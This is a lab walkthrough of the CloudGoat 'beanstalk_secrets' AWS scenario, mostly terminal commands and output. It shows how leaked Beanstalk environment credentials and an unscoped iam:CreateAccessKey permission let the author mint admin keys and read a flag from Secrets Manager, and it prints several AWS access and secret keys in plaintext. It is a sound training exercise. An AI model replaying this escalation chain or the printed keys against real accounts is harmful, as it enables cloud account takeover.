Beanstalk Secrets
Automatically whitelists your IP to allow access to the vulnerable CloudGoat scenario.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# cloudgoat config whitelist --auto
initial_low_priv_credentials = Access Key: AKIAZI2LCSHNOWPG26FR
Secret Key: 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
Confirms the current AWS identity (low-privilege user: cgidrddh9uxljn_low_priv_user).
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws sts get-caller-identity --profile pw
{
"UserId": "AIDAZI2LCSHNL62NPKJBK",
"Account": "637423227354",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user"
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws help
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk help
Retrieves environment ID and endpoint URL for the active Beanstalk application.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-environments --profile pw
{
"Environments": [
{
"EnvironmentName": "cgidrddh9uxljn-env",
"EnvironmentId": "e-nphm6qpyc2",
"ApplicationName": "cgidrddh9uxljn-app",
"SolutionStackName": "64bit Amazon Linux 2023 v4.6.0 running Python 3.11",
"PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0",
"EndpointURL": "awseb-e-n-AWSEBLoa-114Z7VERU1JC9-508425660.us-east-1.elb.amazonaws.com",
"CNAME": "cgidrddh9uxljn-env.eba-ypbpr8em.us-east-1.elasticbeanstalk.com",
"DateCreated": "2025-07-06T07:58:12.268000+00:00",
"DateUpdated": "2025-07-06T08:01:26.202000+00:00",
"Status": "Ready",
"AbortableOperationInProgress": false,
"Health": "Grey",
"HealthStatus": "Pending",
"Tier": {
"Name": "WebServer",
"Type": "Standard",
"Version": "1.0"
},
"EnvironmentLinks": [],
"EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:637423227354:environment/cgidrddh9uxljn-app/cgidrddh9uxljn-env"
}
]
}
Retrieves the name and metadata of the Beanstalk application.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-applications --profile pw
{
"Applications": [
{
"ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:637423227354:application/cgidrddh9uxljn-app",
"ApplicationName": "cgidrddh9uxljn-app",
"Description": "Elastic Beanstalk application for insecure secrets scenario",
"DateCreated": "2025-07-06T07:57:55.841000+00:00",
"DateUpdated": "2025-07-06T07:57:55.841000+00:00",
"ConfigurationTemplates": [],
"ResourceLifecycleConfig": {
"VersionLifecycleConfig": {
"MaxCountRule": {
"Enabled": false,
"MaxCount": 200,
"DeleteSourceFromS3": false
},
"MaxAgeRule": {
"Enabled": false,
"MaxAgeInDays": 180,
"DeleteSourceFromS3": false
}
}
}
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-application-versions --application-name cgidrddh9uxljn-app --version-label "v1" --profile pw
{
"ApplicationVersions": []
}
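Leaks the environment variables configured on the Beanstalk environment, including exposed AWS credentials for a higher-privileged user. As the output below shows, Elastic Beanstalk returns environment properties in plaintext to any principal allowed to describe the configuration settings, so secrets stored there are readable by the low-privilege user.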
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws elasticbeanstalk describe-configuration-settings --environment-name cgidrddh9uxljn-env --application-name cgidrddh9uxljn-app --profile pw | jq '.ConfigurationSettings[0].OptionSettings[] | select(.Namespace=="aws:elasticbeanstalk:application:environment")'
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "PYTHONPATH",
"Value": "/var/app/venv/staging-LQM1lest/bin"
}
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "SECONDARY_ACCESS_KEY",
"Value": "AKIAZI2LCSHND4ONUGEM"
}
{
"Namespace": "aws:elasticbeanstalk:application:environment",
"OptionName": "SECONDARY_SECRET_KEY",
"Value": "pSGrnRE8rRMWqoKWdeB0OHd/BPL+0T+eC8zwQlWJ"
}
Now, using these credentials, enumerate IAM permissions; the goal is to eventually create an access key for an administrator user.
Personal Script
I use my own script to do the IAM enumeration; its output is below.
{
"current_user": "cgidrddh9uxljn_secondary_user",
"users": [
"cgidrddh9uxljn_secondary_user"
],
"managed_policies": {
"cgidrddh9uxljn_secondary_user": [
{
"PolicyName": "cgidrddh9uxljn_secondary_policy",
"PolicyArn": "arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy"
}
]
},
"inline_policies": {
"cgidrddh9uxljn_secondary_user": []
},
"groups_managed_policies": {
"Admin": []
},
"groups_inline_policies": {
"Admin": []
},
"users_groups": {},
"roles": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": {
"RoleId": "AROAZI2LCSHNHAYBZ7NB6",
"Arn": "arn:aws:iam::637423227354:role/cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"AWS": "AIDAZI2LCSHNC6T5WHMCJ"
},
"Action": "sts:AssumeRole"
}
]
}
},
"cgidrddh9uxljn_eb_instance_role": {
"RoleId": "AROAZI2LCSHNFI4A4BNZE",
"Arn": "arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_instance_role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"cgidrddh9uxljn_eb_service_role": {
"RoleId": "AROAZI2LCSHNKBOPAXYCP",
"Arn": "arn:aws:iam::637423227354:role/cgidrddh9uxljn_eb_service_role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticbeanstalk.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"rds-monitoring-role": {
"RoleId": "AROAZI2LCSHNCK26BPXQW",
"Arn": "arn:aws:iam::637423227354:role/rds-monitoring-role",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "monitoring.rds.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
},
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": {
"RoleId": "AROAZI2LCSHNEK7B2PR7Y",
"Arn": "arn:aws:iam::637423227354:role/vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
}
},
"attached_role_policies": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": [],
"cgidrddh9uxljn_eb_instance_role": [],
"cgidrddh9uxljn_eb_service_role": [],
"rds-monitoring-role": [
"arn:aws:iam::aws:policy/service-role/AmazonRDSEnhancedMonitoringRole"
],
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": []
},
"inline_role_policies": {
"cg-lambda-invoker-vulnerable_lambda_cgid1ncsj7bxah": {},
"cgidrddh9uxljn_eb_instance_role": {},
"cgidrddh9uxljn_eb_service_role": {},
"rds-monitoring-role": {},
"vulnerable_lambda_cgid1ncsj7bxah-policy_applier_lambda1": {}
}
}
Managed Policy Versions
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam get-policy \
--policy-arn arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy \
--profile pw
{
"Policy": {
"PolicyName": "cgidrddh9uxljn_secondary_policy",
"PolicyId": "ANPAZI2LCSHNNTIDMXKIF",
"Arn": "arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2025-07-06T07:57:54+00:00",
"UpdateDate": "2025-07-06T07:57:54+00:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam get-policy-version --policy-arn arn:aws:iam::637423227354:policy/cgidrddh9uxljn_secondary_policy --version-id v1 --profile pw
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-07-06T07:57:54+00:00"
}
}
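Since the secondary user's policy allows iam:CreateAccessKey on Resource "*", and you have discovered the user cgidrddh9uxljn_admin_user, you can create new credentials (Access Key + Secret) for that user and gain access as them — even without knowing their existing credentials. The unscoped Resource is the root cause: restricting that statement to the caller's own user ARN would prevent keys from being created for other users.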
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam list-users --profile pw
{
"Users": [
{
"Path": "/",
"UserName": "cgidrddh9uxljn_admin_user",
"UserId": "AIDAZI2LCSHNDLS76Y2GZ",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
},
{
"Path": "/",
"UserName": "cgidrddh9uxljn_low_priv_user",
"UserId": "AIDAZI2LCSHNL62NPKJBK",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
},
{
"Path": "/",
"UserName": "cgidrddh9uxljn_secondary_user",
"UserId": "AIDAZI2LCSHNPBONLSC4A",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_secondary_user",
"CreateDate": "2025-07-06T07:57:54+00:00"
}
]
}
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws iam create-access-key \
--user-name cgidrddh9uxljn_admin_user \
--profile pw
{
"AccessKey": {
"UserName": "cgidrddh9uxljn_admin_user",
"AccessKeyId": "AKIAZI2LCSHNFA6ZBTTK",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2025-07-06T08:46:39+00:00"
}
}
Now configure the CLI profile with these new credentials and confirm the identity:
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws sts get-caller-identity --profile pw
{
"UserId": "AIDAZI2LCSHNDLS76Y2GZ",
"Account": "637423227354",
"Arn": "arn:aws:iam::637423227354:user/cgidrddh9uxljn_admin_user"
}
With these privileges, we will retrieve the flag stored in Secrets Manager.
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws secretsmanager list-secrets --profile pw
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA",
"Name": "cgidrddh9uxljn_final_flag",
"LastChangedDate": "2025-07-06T12:57:55.311000+05:00",
"LastAccessedDate": "2025-07-06T05:00:00+05:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SecretVersionsToStages": {
"terraform-20250706075755171300000002": [
"AWSCURRENT"
]
},
"CreatedDate": "2025-07-06T12:57:54.304000+05:00"
}
]
}
Found The Flag
┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]
└─# aws secretsmanager get-secret-value \
--secret-id cgidrddh9uxljn_final_flag \
--profile pw
{
"ARN": "arn:aws:secretsmanager:us-east-1:637423227354:secret:cgidrddh9uxljn_final_flag-KSYyXA",
"Name": "cgidrddh9uxljn_final_flag",
"VersionId": "terraform-20250706075755171300000002",
"SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-07-06T12:57:55.307000+05:00"
}